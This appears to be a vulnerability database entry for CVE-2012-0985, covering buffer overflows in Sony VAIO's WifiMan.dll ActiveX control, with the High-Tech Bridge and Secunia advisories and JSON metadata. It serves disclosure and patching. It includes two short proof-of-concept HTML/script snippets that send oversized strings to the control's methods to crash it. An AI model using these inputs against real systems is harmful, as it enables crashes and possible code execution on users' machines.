VAR-201206-0197
Vulnerability from variot - Updated: 2025-04-11 23:10Multiple buffer overflows in the Wireless Manager ActiveX control 4.0.0.0 in WifiMan.dll in Sony VAIO PC Wireless LAN Wizard 1.0; VAIO Wireless Wizard 1.00, 1.00_64, 1.0.1, 2.0, and 3.0; SmartWi Connection Utility 4.7, 4.7.4, 4.8, 4.9, 4.10, and 4.11; and VAIO Easy Connect software 1.0.0 and 1.1.0 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long string in the second argument of the (1) SetTmpProfileOption or (2) ConnectToNetwork method. Sony VAIO Wireless Manager ActiveX control ('WifiMan.dll') is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Attackers may exploit these issues to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions. Sony VAIO Wireless Manager 4.0.0.0 is vulnerable; prior versions may also be affected. Sony VAIO is a computer system produced by Sony Corporation. If the attack fails, it will result in a denial of service. Advisory ID: HTB23063 Product: Wireless Manager Sony VAIO Vendor: Sony Computers Vulnerable Version(s): 4.0.0.0 and probably prior Tested Version: 4.0.0.0 Vendor Notification: 7 December 2011 Vendor Patch: 20 January 2012 Public Disclosure: 30 May 2012 Vulnerability Type: Buffer Overflow CVE Reference: CVE-2012-0985 Solution Status: Fixed by Vendor Risk Level: High Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ )
Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on vulnerable system.
1) Buffer Overflow in Wireless Manager Sony VAIO: CVE-2012-0985
1.1 The method SetTmpProfileOption() in WifiMan.dll library does not properly check the length of string parameters.
The following PoC will crash the application:
function Do_() { arg1=1 arg2=String(8212, "X") arg3="defaultV" SetTmpProfileOption arg1 ,arg2 ,arg3 }1.2 The method ConnectToNetwork() in WifiMan.dll library does not properly check the length of string parameters.
The following PoC will crash the application:
function Do_() { arg1=1 arg2=String(6164, "X") target.ConnectToNetwork arg1 ,arg2 }Solution:
Sony has released a security update for the Affected Models that resolves this issue. Sony recommends that all customers who have Affected Models immediately install the latest version of the software by using VAIO Update.
Note: If you are using the default VAIO Update settings the update will be installed automatically.
More information and security update: http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946
References:
[1] High-Tech Bridge Advisory HTB23063 - https://www.htbridge.com/advisory/HTB23063 - Buffer Overflow in Wireless Manager Sony VAIO. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch
TITLE: Sony VAIO WifiMan ActiveX Control Two Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA49340
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49340/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49340
RELEASE DATE: 2012-06-01
DISCUSS ADVISORY: http://secunia.com/advisories/49340/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/49340/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49340
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: High-Tech Bridge SA has reported two vulnerabilities in Sony VAIO WifiMan ActiveX Control, which can be exploited by malicious people to compromise a user's system.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code.
PROVIDED AND/OR DISCOVERED BY: High-Tech Bridge SA
ORIGINAL ADVISORY: Sony: http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946
High-Tech Bridge SA: https://www.htbridge.com/advisory/HTB23063
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201206-0197",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "vaio pc wireless lan wizard",
"scope": "eq",
"trust": 1.8,
"vendor": "sony",
"version": "1.0"
},
{
"model": "vaio wireless wizard",
"scope": "eq",
"trust": 1.8,
"vendor": "sony",
"version": "1.00"
},
{
"model": "vaio wireless wizard",
"scope": "eq",
"trust": 1.8,
"vendor": "sony",
"version": "1.00_64"
},
{
"model": "vaio wireless wizard",
"scope": "eq",
"trust": 1.8,
"vendor": "sony",
"version": "2.0"
},
{
"model": "smartwi connection utillity",
"scope": "eq",
"trust": 1.6,
"vendor": "sony",
"version": "4.7.4"
},
{
"model": "smartwi connection utillity",
"scope": "eq",
"trust": 1.6,
"vendor": "sony",
"version": "4.9"
},
{
"model": "vaio easy connect",
"scope": "eq",
"trust": 1.6,
"vendor": "sony",
"version": "1.1.0"
},
{
"model": "vaio wireless wizard",
"scope": "eq",
"trust": 1.6,
"vendor": "sony",
"version": "3.0"
},
{
"model": "vaio wireless wizard",
"scope": "eq",
"trust": 1.6,
"vendor": "sony",
"version": "1.01"
},
{
"model": "smartwi connection utillity",
"scope": "eq",
"trust": 1.6,
"vendor": "sony",
"version": "4.11"
},
{
"model": "smartwi connection utillity",
"scope": "eq",
"trust": 1.6,
"vendor": "sony",
"version": "4.8"
},
{
"model": "vaio easy connect",
"scope": "eq",
"trust": 1.6,
"vendor": "sony",
"version": "1.0.0"
},
{
"model": "smartwi connection utillity",
"scope": "eq",
"trust": 1.6,
"vendor": "sony",
"version": "4.7"
},
{
"model": "smartwi connection utillity",
"scope": "eq",
"trust": 1.6,
"vendor": "sony",
"version": "4.10"
},
{
"model": "smartwi connection utility",
"scope": "eq",
"trust": 0.8,
"vendor": "sony",
"version": "4.7"
},
{
"model": "smartwi connection utility",
"scope": "eq",
"trust": 0.8,
"vendor": "sony",
"version": "4.7.4"
},
{
"model": "smartwi connection utility",
"scope": "eq",
"trust": 0.8,
"vendor": "sony",
"version": "4.8"
},
{
"model": "smartwi connection utility",
"scope": "eq",
"trust": 0.8,
"vendor": "sony",
"version": "4.9"
},
{
"model": "smartwi connection utility",
"scope": "eq",
"trust": 0.8,
"vendor": "sony",
"version": "4.10"
},
{
"model": "smartwi connection utility",
"scope": "eq",
"trust": 0.8,
"vendor": "sony",
"version": "and 4.11"
},
{
"model": "vaio easy connect",
"scope": "eq",
"trust": 0.8,
"vendor": "sony",
"version": "software 1.0.0 and 1.1.0"
},
{
"model": "vaio wireless wizard",
"scope": "eq",
"trust": 0.8,
"vendor": "sony",
"version": "1.0.1"
},
{
"model": "vaio wireless wizard",
"scope": "eq",
"trust": 0.8,
"vendor": "sony",
"version": "and 3.0"
},
{
"model": "vaio wireless manager",
"scope": "eq",
"trust": 0.3,
"vendor": "sony",
"version": "4.0.0.0"
}
],
"sources": [
{
"db": "BID",
"id": "53735"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002641"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-543"
},
{
"db": "NVD",
"id": "CVE-2012-0985"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:sony:smartwi_connection_utillity",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:sony:vaio_easy_connect",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:sony:vaio_pc_wireless_lan_wizard",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:sony:vaio_wireless_wizard",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002641"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "High-Tech Bridge SA",
"sources": [
{
"db": "BID",
"id": "53735"
},
{
"db": "PACKETSTORM",
"id": "113131"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-543"
}
],
"trust": 1.0
},
"cve": "CVE-2012-0985",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2012-0985",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-54266",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2012-0985",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2012-0985",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201205-543",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-54266",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2012-0985",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54266"
},
{
"db": "VULMON",
"id": "CVE-2012-0985"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002641"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-543"
},
{
"db": "NVD",
"id": "CVE-2012-0985"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple buffer overflows in the Wireless Manager ActiveX control 4.0.0.0 in WifiMan.dll in Sony VAIO PC Wireless LAN Wizard 1.0; VAIO Wireless Wizard 1.00, 1.00_64, 1.0.1, 2.0, and 3.0; SmartWi Connection Utility 4.7, 4.7.4, 4.8, 4.9, 4.10, and 4.11; and VAIO Easy Connect software 1.0.0 and 1.1.0 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long string in the second argument of the (1) SetTmpProfileOption or (2) ConnectToNetwork method. Sony VAIO Wireless Manager ActiveX control (\u0027WifiMan.dll\u0027) is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. \nAttackers may exploit these issues to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions. \nSony VAIO Wireless Manager 4.0.0.0 is vulnerable; prior versions may also be affected. Sony VAIO is a computer system produced by Sony Corporation. If the attack fails, it will result in a denial of service. Advisory ID: HTB23063\nProduct: Wireless Manager Sony VAIO\nVendor: Sony Computers\nVulnerable Version(s): 4.0.0.0 and probably prior\nTested Version: 4.0.0.0\nVendor Notification: 7 December 2011 \nVendor Patch: 20 January 2012 \nPublic Disclosure: 30 May 2012 \nVulnerability Type: Buffer Overflow\nCVE Reference: CVE-2012-0985\nSolution Status: Fixed by Vendor\nRisk Level: High \nCredit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on vulnerable system. \n\n\n1) Buffer Overflow in Wireless Manager Sony VAIO: CVE-2012-0985\n\n\n1.1 The method SetTmpProfileOption() in WifiMan.dll library does not properly check the length of string parameters. \n\nThe following PoC will crash the application:\n\n\n\u003cHTML\u003e\n\u003cBODY\u003e\n\u003cobject id=ctrl \nclassid=\"clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}\"\u003e\u003c/object\u003e\n\u003cSCRIPT\u003e\nfunction Do_()\n{\n arg1=1\n arg2=String(8212, \"X\")\n arg3=\"defaultV\"\n SetTmpProfileOption arg1 ,arg2 ,arg3\n}\n\u003c/SCRIPT\u003e\n\u003cinput language=JavaScript onclick=Do_() type=button value=\"Sony_POC\"\u003e\n\u003c/BODY\u003e\n\u003c/HTML\u003e\n\n\n\n1.2 The method ConnectToNetwork() in WifiMan.dll library does not properly check the length of string parameters. \n\nThe following PoC will crash the application:\n\n\n\u003cHTML\u003e\n\u003cBODY\u003e\n\u003cobject id=ctrl \nclassid=\"clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}\"\u003e\u003c/object\u003e\n\u003cSCRIPT\u003e\nfunction Do_()\n{\n arg1=1\n arg2=String(6164, \"X\")\n target.ConnectToNetwork arg1 ,arg2\n}\n\u003c/SCRIPT\u003e\n\u003cinput language=JavaScript onclick=Do_() type=button value=\"Sony_POC\"\u003e\n\u003c/BODY\u003e\n\u003c/HTML\u003e\n\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nSony has released a security update for the Affected Models that resolves this issue. Sony recommends that all customers who have Affected Models immediately install the latest version of the software by using VAIO Update. \n\nNote: If you are using the default VAIO Update settings the update will be installed automatically. \n\nMore information and security update:\n\u003ca href=\"http://esupport.sony.com/US/perl/support-info.pl?template_id=1\u0026info_id=946\" target=\"_blank\"\u003ehttp://esupport.sony.com/US/perl/support-info.pl?template_id=1\u0026info_id=946\u003c/a\u003e\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23063 - https://www.htbridge.com/advisory/HTB23063 - Buffer Overflow in Wireless Manager Sony VAIO. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. ----------------------------------------------------------------------\n\nBecome a PSI 3.0 beta tester!\nTest-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. \nDownload it here!\nhttp://secunia.com/psi_30_beta_launch\n\n----------------------------------------------------------------------\n\nTITLE:\nSony VAIO WifiMan ActiveX Control Two Buffer Overflow Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA49340\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/49340/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=49340\n\nRELEASE DATE:\n2012-06-01\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/49340/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/49340/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=49340\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nHigh-Tech Bridge SA has reported two vulnerabilities in Sony VAIO\nWifiMan ActiveX Control, which can be exploited by malicious people\nto compromise a user\u0027s system. \n\nSuccessful exploitation of the vulnerabilities may allow execution of\narbitrary code. \n\nPROVIDED AND/OR DISCOVERED BY:\nHigh-Tech Bridge SA\n\nORIGINAL ADVISORY:\nSony:\nhttp://esupport.sony.com/US/perl/support-info.pl?template_id=1\u0026info_id=946\n\nHigh-Tech Bridge SA:\nhttps://www.htbridge.com/advisory/HTB23063\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-0985"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002641"
},
{
"db": "BID",
"id": "53735"
},
{
"db": "VULHUB",
"id": "VHN-54266"
},
{
"db": "VULMON",
"id": "CVE-2012-0985"
},
{
"db": "PACKETSTORM",
"id": "113131"
},
{
"db": "PACKETSTORM",
"id": "113193"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-54266",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=18958",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54266"
},
{
"db": "VULMON",
"id": "CVE-2012-0985"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-0985",
"trust": 3.0
},
{
"db": "BID",
"id": "53735",
"trust": 2.1
},
{
"db": "SECUNIA",
"id": "49340",
"trust": 2.0
},
{
"db": "EXPLOIT-DB",
"id": "18958",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "82401",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002641",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201205-543",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20120530 2 BUFFER OVERFLOWS IN WIRELESS MANAGER SONY VAIO",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "19725",
"trust": 0.6
},
{
"db": "XF",
"id": "75978",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "113131",
"trust": 0.2
},
{
"db": "IMMUNIWEB",
"id": "HTB23063",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-72947",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-54266",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2012-0985",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "113193",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54266"
},
{
"db": "VULMON",
"id": "CVE-2012-0985"
},
{
"db": "BID",
"id": "53735"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002641"
},
{
"db": "PACKETSTORM",
"id": "113131"
},
{
"db": "PACKETSTORM",
"id": "113193"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-543"
},
{
"db": "NVD",
"id": "CVE-2012-0985"
}
]
},
"id": "VAR-201206-0197",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-54266"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T23:10:44.539000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Update Program for VAIO Personal Computers",
"trust": 0.8,
"url": "http://esupport.sony.com/US/perl/support-info.pl?template_id=1\u0026info_id=946"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002641"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54266"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002641"
},
{
"db": "NVD",
"id": "CVE-2012-0985"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.securityfocus.com/bid/53735"
},
{
"trust": 1.8,
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0147.html"
},
{
"trust": 1.8,
"url": "http://www.exploit-db.com/exploits/18958"
},
{
"trust": 1.8,
"url": "http://osvdb.org/82401"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/49340"
},
{
"trust": 1.8,
"url": "http://esupport.sony.com/us/perl/support-info.pl?template_id=1\u0026info_id=946"
},
{
"trust": 1.2,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75978"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0985"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0985"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/75978"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/19725"
},
{
"trust": 0.4,
"url": "http://www.sony.co.uk/hub/vaio-laptops"
},
{
"trust": 0.3,
"url": "/archive/1/522916"
},
{
"trust": 0.2,
"url": "https://www.htbridge.com/advisory/htb23063"
},
{
"trust": 0.1,
"url": "http://esupport.sony.com/us/perl/support-info.pl?template_id=1\u0026amp;info_id=946"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/18958/"
},
{
"trust": 0.1,
"url": "https://www.htbridge.com/advisory/"
},
{
"trust": 0.1,
"url": "http://esupport.sony.com/us/perl/support-info.pl?template_id=1\u0026info_id=946\""
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0985"
},
{
"trust": 0.1,
"url": "http://esupport.sony.com/us/perl/support-info.pl?template_id=1\u0026info_id=946\u003c/a\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/"
},
{
"trust": 0.1,
"url": "http://secunia.com/psi_30_beta_launch"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/49340/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=49340"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/49340/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54266"
},
{
"db": "VULMON",
"id": "CVE-2012-0985"
},
{
"db": "BID",
"id": "53735"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002641"
},
{
"db": "PACKETSTORM",
"id": "113131"
},
{
"db": "PACKETSTORM",
"id": "113193"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-543"
},
{
"db": "NVD",
"id": "CVE-2012-0985"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-54266"
},
{
"db": "VULMON",
"id": "CVE-2012-0985"
},
{
"db": "BID",
"id": "53735"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002641"
},
{
"db": "PACKETSTORM",
